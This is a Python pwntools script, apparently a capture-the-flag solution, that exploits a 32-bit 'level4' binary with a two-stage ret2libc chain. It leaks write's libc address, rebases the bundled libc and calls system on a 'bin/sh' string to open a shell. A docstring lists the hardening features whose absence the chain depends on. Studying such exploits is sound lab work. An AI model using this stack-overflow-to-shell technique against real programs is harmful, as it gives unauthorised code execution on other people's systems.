"""Exploit walk-through for the 'level4' CTF binary (32-bit, ret2libc).

Stage 1 leaks the runtime address of ``write`` through the binary's own
``write@plt`` / ``write@got`` pair and returns into ``main``; stage 2
reuses the leak to rebase the bundled libc and call ``system`` with a
``/bin/sh`` string found inside it.  The padding length (0x88 + 0x4) and
the libc file are specific to this challenge.

Read defensively, each stage depends on a missing hardening feature:
taking PLT/GOT/symbol addresses straight from the ELF presumes a non-PIE
binary, overwriting the saved return address presumes no stack canary,
and the single libc leak presumes that the rest of libc sits at fixed
offsets from it.  PIE, stack protectors and full RELRO each remove one
link of this chain; none of that can be confirmed from the script alone.
"""
from pwn import *
from LibcSearcher import *  # NOTE(review): not used below — libc is loaded from a local file

# Debug-level logging dumps every byte sent and received; useful for
# local analysis, noisy otherwise.
context.log_level = 'debug'
proc_name = './level4'
p = process(proc_name)

elf = ELF(proc_name)
write_plt = elf.plt['write']   # PLT stub for write, taken as a fixed address
write_got = elf.got['write']   # GOT slot that holds write's resolved libc address
main_addr = elf.sym['main']    # return target, so a second payload can be sent to the same process

# Stage 1 frame: padding, then write@plt as the return address, main as
# write's own return address, and the arguments write(1, write_got, 4).
# 0x88 + 0x4 presumably spans the local buffer plus saved frame pointer
# up to the return address — challenge-specific, verify in the disassembly.
payload = b'a' * (0x88 + 0x4) + p32(write_plt) + p32(main_addr) + p32(0x1) + p32(write_got) + p32(0x4)
gdb.attach(p)   # attach a debugger to the child before the first send
sleep(1)        # presumably gives the debugger time to attach — TODO confirm
p.send(payload)
write_addr = u32(p.recv(4))   # the 4 bytes written back are write's runtime address
print(hex(write_addr))

libc=ELF('./libc-2.23_32.so')

# Stage 2: derive the libc load base from the leak; every other symbol in
# this libc build is then a constant offset from that base.
libc_base = write_addr - libc.sym['write']
system_addr = libc_base + libc.sym['system']
str_bin_sh = libc_base + next(libc.search(b'bin/sh'))   # first occurrence of "bin/sh" in the libc image
# Second frame: system as the return address, main as system's return
# address, and the string pointer as system's single argument.
payload1 = b'a' * (0x88 + 0x4) + p32(system_addr) + p32(main_addr) + p32(str_bin_sh)
p.send(payload1)

p.interactive()